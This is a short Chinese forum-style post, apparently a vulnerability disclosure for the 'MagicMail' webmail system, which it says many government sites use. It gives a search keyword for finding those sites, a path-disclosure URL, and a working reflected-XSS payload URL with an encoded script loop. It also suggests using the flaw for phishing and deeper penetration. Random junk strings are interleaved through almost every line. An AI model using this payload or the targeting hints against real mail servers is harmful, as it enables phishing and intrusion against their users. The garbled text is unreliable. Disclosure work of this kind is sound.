今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
" O3 v U; |$ S- K4 N/ ^9 W, e' t8 H
0 H8 U! a/ b# z: z
包含 一个反射性XSS 以及 绝对路径泄漏
& m' D; r7 S- e3 y. v看了看 貌似全部是linux的。
( {9 d5 f. ]' U h5 {7 G" n # h/ Q, e0 p' N# A; z
关键字:迈捷邮件系统 by MagicMail
" B& {/ I7 T5 I0 N' ^
. f" C8 N" q, _5 M可以看到很多政府网站都用这个邮件系统
) `' K; y0 D5 n1 Z/ S& F$ q, z b
绝对路径 http://madman.in/index.php?login_type=declare&language=
4 G. Z8 t- d& ~' G7 h6 H# v2 i i$ m2 F$ u- m& X6 K* A
% O$ z5 N# n E# j2 {: _" m0 O- Z% `/ ?! ]$ C
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
; x3 D8 R& }5 R) Y' i2 s
+ t1 S! m: f' B+ n, w1 a0 a: l' ~; `" ^. I
$ E! I0 \9 m0 p2 o: t% ^
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
+ T; w+ Z: y5 D j% q9 D3 \# a
# d( ]) a/ k+ W修复方案:看官方补丁吧。& ]( m( p% b# z
|